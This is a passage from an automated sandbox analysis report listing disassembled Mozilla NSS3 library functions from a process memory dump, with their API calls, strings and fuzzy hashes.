                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                            • String ID:
                                                            • API String ID: 3383223490-0
                                                            • Opcode ID: 139893baf37d460e8dc5f4715c37d26f1d2d61217b2127f6c44a010a5a2dd461
                                                            • Instruction ID: 181bfa1f4179bf7c5053bb86b78af82138709cc03c2b06936cffe4289df4c649
                                                            • Opcode Fuzzy Hash: 139893baf37d460e8dc5f4715c37d26f1d2d61217b2127f6c44a010a5a2dd461
                                                            • Instruction Fuzzy Hash: 02F1ACB1D01209DFDF00DFA8D845BAABBB5BF09318F188268EC45A7711E731E995CB81
                                                            Function 6CA46CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 6CA46910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CA46943
                                                              • Part of subcall function 6CA46910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CA46957
                                                              • Part of subcall function 6CA46910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CA46972
                                                              • Part of subcall function 6CA46910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CA46983
                                                              • Part of subcall function 6CA46910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CA469AA
                                                              • Part of subcall function 6CA46910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CA469BE
                                                              • Part of subcall function 6CA46910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CA469D2
                                                              • Part of subcall function 6CA46910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CA469DF
                                                              • Part of subcall function 6CA46910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CA46A5B
                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CA46D8C
                                                            • free.MOZGLUE(00000000), ref: 6CA46DC5
                                                            • free.MOZGLUE(?), ref: 6CA46DD6
                                                            • free.MOZGLUE(?), ref: 6CA46DE7
                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CA46E1F
                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CA46E4B
                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CA46E72
                                                            • free.MOZGLUE(?), ref: 6CA46EA7
                                                            • free.MOZGLUE(?), ref: 6CA46EC4
                                                            • free.MOZGLUE(?), ref: 6CA46ED5
                                                            • free.MOZGLUE(00000000), ref: 6CA46EE3
                                                            • free.MOZGLUE(?), ref: 6CA46EF4
                                                            • free.MOZGLUE(?), ref: 6CA46F08
                                                            • free.MOZGLUE(00000000), ref: 6CA46F35
                                                            • free.MOZGLUE(?), ref: 6CA46F44
                                                            • free.MOZGLUE(?), ref: 6CA46F5B
                                                            • free.MOZGLUE(00000000), ref: 6CA46F65
                                                              • Part of subcall function 6CA46C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CA4781D,00000000,6CA3BE2C,?,6CA46B1D,?,?,?,?,00000000,00000000,6CA4781D), ref: 6CA46C40
                                                              • Part of subcall function 6CA46C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CA4781D,?,6CA3BE2C,?), ref: 6CA46C58
                                                              • Part of subcall function 6CA46C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CA4781D), ref: 6CA46C6F
                                                              • Part of subcall function 6CA46C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CA46C84
                                                              • Part of subcall function 6CA46C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CA46C96
                                                              • Part of subcall function 6CA46C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CA46CAA
                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CA46F90
                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CA46FC5
                                                            • PK11_GetInternalKeySlot.NSS3 ref: 6CA46FF4
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                            • String ID:
                                                            • API String ID: 1304971872-0
                                                            • Opcode ID: 70af167050dda6bbb8d8d286809494a5135ad8d121a9772d98e1a4c257d0451c
                                                            • Instruction ID: 41ff2f7df7136665aa2812b002b52b6cdecbd29b138eee88ba39715fa7e3d208
                                                            • Opcode Fuzzy Hash: 70af167050dda6bbb8d8d286809494a5135ad8d121a9772d98e1a4c257d0451c
                                                            • Instruction Fuzzy Hash: C8B182B4E012199FEF00CFA5D845B9EBBF5AF09348F188025E815E7B41E731E994CBA1
                                                            Function 6CA44C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsGetValue.KERNEL32 ref: 6CA44C4C
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA44C60
                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CA44CA1
                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CA44CBE
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CA44CD2
                                                            • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA44D3A
                                                            • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA44D4F
                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CA44DB7
                                                              • Part of subcall function 6CAADD70: TlsGetValue.KERNEL32 ref: 6CAADD8C
                                                              • Part of subcall function 6CAADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADDB4
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07AD
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07CD
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07D6
                                                              • Part of subcall function 6C9F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C98204A), ref: 6C9F07E4
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,6C98204A), ref: 6C9F0864
                                                              • Part of subcall function 6C9F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C9F0880
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C98204A), ref: 6C9F08CB
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(?,?,6C98204A), ref: 6C9F08D7
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(?,?,6C98204A), ref: 6C9F08FB
                                                            • TlsGetValue.KERNEL32 ref: 6CA44DD7
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA44DEC
                                                            • PR_Unlock.NSS3(?), ref: 6CA44E1B
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA44E2F
                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA44E5A
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA44E71
                                                            • free.MOZGLUE(00000000), ref: 6CA44E7A
                                                            • PR_Unlock.NSS3(?), ref: 6CA44EA2
                                                            • TlsGetValue.KERNEL32 ref: 6CA44EC1
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA44ED6
                                                            • PR_Unlock.NSS3(?), ref: 6CA44F01
                                                            • free.MOZGLUE(00000000), ref: 6CA44F2A
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                            • String ID:
                                                            • API String ID: 759471828-0
                                                            • Opcode ID: f6b55201da5a510d29ee0c3182c1e60ab134350d3ccd526cbe45bf08fc3d9bc9
                                                            • Instruction ID: 7709081aa96f3e2ac21adac4e0c4726fb7090c5ac02dbc488eaee995a8314148
                                                            • Opcode Fuzzy Hash: f6b55201da5a510d29ee0c3182c1e60ab134350d3ccd526cbe45bf08fc3d9bc9
                                                            • Instruction Fuzzy Hash: 4CB1F275E002069FEB00EF68D885BAA77B4BF09318F488124ED1597B41EB34E9A5CBD1
                                                            Function 6CA96E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CA96BF7), ref: 6CA96EB6
                                                              • Part of subcall function 6C9F1240: TlsGetValue.KERNEL32(00000040,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F1267
                                                              • Part of subcall function 6C9F1240: EnterCriticalSection.KERNEL32(?,?,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F127C
                                                              • Part of subcall function 6C9F1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F1291
                                                              • Part of subcall function 6C9F1240: PR_Unlock.NSS3(?,?,?,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F12A0
                                                            • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CB3FC0A,6CA96BF7), ref: 6CA96ECD
                                                            • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CA96EE0
                                                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CA96EFC
                                                            • PR_NewLock.NSS3 ref: 6CA96F04
                                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA96F18
                                                            • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CA96BF7), ref: 6CA96F30
                                                            • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CA96BF7), ref: 6CA96F54
                                                            • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CA96BF7), ref: 6CA96FE0
                                                            • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CA96BF7), ref: 6CA96FFD
                                                            Strings
                                                            • NSS_SSL_CBC_RANDOM_IV, xrefs: 6CA96FF8
                                                            • SSLFORCELOCKS, xrefs: 6CA96F2B
                                                            • # SSL/TLS secrets log file, generated by NSS, xrefs: 6CA96EF7
                                                            • SSLKEYLOGFILE, xrefs: 6CA96EB1
                                                            • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CA96F4F
                                                            • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CA96FDB
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                            • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                            • API String ID: 412497378-2352201381
                                                            • Opcode ID: 2be8d6e6aae305cbdf365ec6689e287736a5788c6103ca0ac01eae8937d4665e
                                                            • Instruction ID: 954ab19f71d622916aa1a6d26c3e4eb3c2e1198ceef54b9b55215bfc98fbf068
                                                            • Opcode Fuzzy Hash: 2be8d6e6aae305cbdf365ec6689e287736a5788c6103ca0ac01eae8937d4665e
                                                            • Instruction Fuzzy Hash: FAA139B2A7989087E710463ECC023A932E2BB93329F5C4365E931C7FD9DB7594C08396
                                                            Function 6CA15DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA15DEC
                                                            • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6CA15E0F
                                                            • PORT_ZAlloc_Util.NSS3(00000828), ref: 6CA15E35
                                                            • SECKEY_CopyPublicKey.NSS3(?), ref: 6CA15E6A
                                                            • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6CA15EC3
                                                            • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6CA15ED9
                                                            • SECKEY_SignatureLen.NSS3(?), ref: 6CA15F09
                                                            • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6CA15F49
                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CA15F89
                                                            • free.MOZGLUE(?), ref: 6CA15FA0
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA15FB6
                                                            • free.MOZGLUE(00000000), ref: 6CA15FBF
                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA1600C
                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA16079
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA16084
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA16094
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                            • String ID:
                                                            • API String ID: 2310191401-3916222277
                                                            • Opcode ID: f9f55b87c09e624c052f0aa86217f04505e3c391687a3c5693449ef2bcff2c09
                                                            • Instruction ID: 7bdfa098a17f30dace47956b7e7715f5f5ebb55ecffe299caa7bde61304ac6da
                                                            • Opcode Fuzzy Hash: f9f55b87c09e624c052f0aa86217f04505e3c391687a3c5693449ef2bcff2c09
                                                            • Instruction Fuzzy Hash: C481F6B5E082059BDB10CE64CD80BAE77B5AF05318F188128E819E7F91E731E998CBD1
                                                            Function 6CA36D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_Digest), ref: 6CA36D86
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA36DB4
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA36DC3
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA36DD9
                                                            • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CA36DFA
                                                            • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CA36E13
                                                            • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6CA36E2C
                                                            • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6CA36E47
                                                            • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6CA36EB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                            • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
                                                            • API String ID: 1003633598-2270781106
                                                            • Opcode ID: 19f3206cb8d57b82d96000265fa36f2af6343ef1e3be74cde65a6f7ad20a60d7
                                                            • Instruction ID: a7e734d9c144b641592b81f0d5ef5501b2bc49b0f275df0e0d7ead42c2f81d0c
                                                            • Opcode Fuzzy Hash: 19f3206cb8d57b82d96000265fa36f2af6343ef1e3be74cde65a6f7ad20a60d7
                                                            • Instruction Fuzzy Hash: FA41E4356010A4AFEB01DF55ED59EAA3BB5BB42358F085024F80DD7B51DB34D89CCB92
                                                            Function 6CA39C40 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_LoginUser), ref: 6CA39C66
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA39C94
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA39CA3
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA39CB9
                                                            • PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6CA39CDA
                                                            • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CA39CF5
                                                            • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CA39D10
                                                            • PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6CA39D29
                                                            • PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6CA39D42
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                            • String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
                                                            • API String ID: 1003633598-3838449515
                                                            • Opcode ID: c9394997eadabcae94c02ab33ebebe443c60b2b259378da4f83555bf8cc91315
                                                            • Instruction ID: 66236855c742f349738f7f98e78fd121451f638c35a7a7fad91be04c87a80b51
                                                            • Opcode Fuzzy Hash: c9394997eadabcae94c02ab33ebebe443c60b2b259378da4f83555bf8cc91315
                                                            • Instruction Fuzzy Hash: B84117356010A4AFEB01CF65EE59EAE3BB5AB4235DF485014F80DEBA51DF34C858CB92
                                                            Function 6CB19C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • calloc.MOZGLUE(00000001,00000080), ref: 6CB19C70
                                                            • PR_NewLock.NSS3 ref: 6CB19C85
                                                              • Part of subcall function 6CAC98D0: calloc.MOZGLUE(00000001,00000084,6C9F0936,00000001,?,6C9F102C), ref: 6CAC98E5
                                                            • PR_NewCondVar.NSS3(00000000), ref: 6CB19C96
                                                              • Part of subcall function 6C9EBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C9F21BC), ref: 6C9EBB8C
                                                            • PR_NewLock.NSS3 ref: 6CB19CA9
                                                              • Part of subcall function 6CAC98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CAC9946
                                                              • Part of subcall function 6CAC98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C9816B7,00000000), ref: 6CAC994E
                                                              • Part of subcall function 6CAC98D0: free.MOZGLUE(00000000), ref: 6CAC995E
                                                            • PR_NewLock.NSS3 ref: 6CB19CB9
                                                            • PR_NewLock.NSS3 ref: 6CB19CC9
                                                            • PR_NewCondVar.NSS3(00000000), ref: 6CB19CDA
                                                              • Part of subcall function 6C9EBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C9EBBEB
                                                              • Part of subcall function 6C9EBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C9EBBFB
                                                              • Part of subcall function 6C9EBB80: GetLastError.KERNEL32 ref: 6C9EBC03
                                                              • Part of subcall function 6C9EBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C9EBC19
                                                              • Part of subcall function 6C9EBB80: free.MOZGLUE(00000000), ref: 6C9EBC22
                                                            • PR_NewCondVar.NSS3(?), ref: 6CB19CF0
                                                            • PR_NewPollableEvent.NSS3 ref: 6CB19D03
                                                              • Part of subcall function 6CB0F3B0: PR_CallOnce.NSS3(6CB614B0,6CB0F510), ref: 6CB0F3E6
                                                              • Part of subcall function 6CB0F3B0: PR_CreateIOLayerStub.NSS3(6CB6006C), ref: 6CB0F402
                                                              • Part of subcall function 6CB0F3B0: PR_Malloc.NSS3(00000004), ref: 6CB0F416
                                                              • Part of subcall function 6CB0F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6CB0F42D
                                                              • Part of subcall function 6CB0F3B0: PR_SetSocketOption.NSS3(?), ref: 6CB0F455
                                                              • Part of subcall function 6CB0F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6CB0F473
                                                              • Part of subcall function 6CAC9890: TlsGetValue.KERNEL32(?,?,?,6CAC97EB), ref: 6CAC989E
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB19D78
                                                            • calloc.MOZGLUE(00000001,0000000C), ref: 6CB19DAF
                                                            • _PR_CreateThread.NSS3(00000000,6CB19EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6CB19D9F
                                                              • Part of subcall function 6C9EB3C0: TlsGetValue.KERNEL32 ref: 6C9EB403
                                                              • Part of subcall function 6C9EB3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C9EB459
                                                            • _PR_CreateThread.NSS3(00000000,6CB1A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6CB19DE8
                                                            • calloc.MOZGLUE(00000001,0000000C), ref: 6CB19DFC
                                                            • _PR_CreateThread.NSS3(00000000,6CB1A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6CB19E29
                                                            • calloc.MOZGLUE(00000001,0000000C), ref: 6CB19E3D
                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6CB19E71
                                                            • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CB19E89
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                            • String ID:
                                                            • API String ID: 4254102231-0
